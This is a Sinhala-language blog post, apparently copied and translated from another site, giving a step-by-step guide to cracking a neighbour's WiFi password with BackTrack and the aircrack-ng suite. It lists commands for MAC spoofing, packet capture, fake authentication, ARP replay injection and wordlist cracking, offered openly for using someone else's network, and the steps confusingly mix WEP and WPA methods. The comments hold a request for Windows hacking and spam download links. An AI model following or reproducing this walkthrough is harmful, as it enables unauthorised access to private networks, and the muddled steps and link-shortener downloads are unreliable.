WiFi Password එකක් Hack කරමු... podiwadakaraya


WiFi Password එකක් Hack කරමු...



                                 මම අද ඔය ගොල්ලන්ට දෙන්න යන පොස්ට් එක මම ලියපු එකක්නන් නෙමයි වෙන Site එකක තිබුනු එකක් එඋනාට ඔයලට මෙ පොස්ට් එක ගොඩක් වැදගත්වෙයි කියල හිතුනු නිසයි මෙ පොස්ට් එක ඔයාලට දෙන්න හිතුනෙ ආ තව දෙයක් මම මෙ කියන වැඩ කැල්ල චෙක් කරල බලුවෙනන්නැ යලුවනෙ හොදද (මෙම චෙදයෙන් පසු පලකරන සියල්ල උපුටා ගැනිමකි - http://www.ikmanitlk.com/2015/07/wifi-password-hack.html#more)

මම දන්නව අපේ උන් හැකින් එකක් කිවුවොත් නොකා නොබී හරි ඒක කරනව.ෆේස්බුක් ගෲප් කිහිපෙකම අහල තිබුන WiFi හැක් කරන්නෙ කොහොමද කියල.මට පොඩි අප්සට් එකකට තියෙන්නෙ Video එකක් කරල දාන්න බැරි උන එක.ඒක නිසා ඉංග්‍රීසි පෝස්ට් එකක් ට්‍රාන්ස්ලේට් කරල ඔයාලට දෙන්න උනා..


ඔයාලට WiFi Hack කරන්න මෙන්න මේ ටික ඕන වෙනව.

Compatible Wireless Adapter
Linax BackTrack 5r3 DVD
password list downlord
http://adf.ly/1HGupH

WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.Virtuual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි ඔන්න එහෙනම් අපි වඩේට බහිමු.ඔයාල බැක්ට්‍රැක් දාගත්තනේ.දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.

airmon-ng


මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම හොඳේ.

දැන් මේ විදානය දෙන්න.
airmon-ng stop ra0

මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down

දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0

දැන් මේ විදානය දෙන්න.

airmon-ng start ra0

මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.
  
airodump-ng ra0
මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0

මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0

දැන් මේ විදානය දෙන්න.

aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.


aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)
ඊට පස්සෙ අපිට පුලුවන් දැනට ලොග් වෙල් ඉන්න කෙනාගේ උදවුවෙන් ලොග් වෙල ඉන්න WiFi නෙට්වර්ක් එකේ පාස්කී එක ලබා ගන්න. ඒකට පහල විදානය දෙන්න. මෙතන් list කියන තැනට අපි අර බාගත්ත පාස්වර්ඩ් ලිස්ට් එකේ පාත් එක දෙන්න ඕනේ.

 aircrack-ng crackwpa-01.cap –w list


ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.

උපුටා ගැනිම - http://www.ikmanitlk.com/2015/07/wifi-password-hack.html#more


මෙවගෙ තව වැඩකැලි ගොඩක් යිස්සරහට ඔයාලට අරගෙන එන්නන් 
ඔයලට ජය..........

2 Comments

  1. windows වලින් wifi හැක් කරන හැටි කියන්නකෝ ???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/

    ReplyDelete
  2. Wifi Password එකක් Hack කරමු... Podiwadakaraya ~ Podiwadakaraya >>>>> Download Now

    >>>>> Download Full

    Wifi Password එකක් Hack කරමු... Podiwadakaraya ~ Podiwadakaraya >>>>> Download LINK

    >>>>> Download Now

    Wifi Password එකක් Hack කරමු... Podiwadakaraya ~ Podiwadakaraya >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
Previous Post Next Post

Contact Form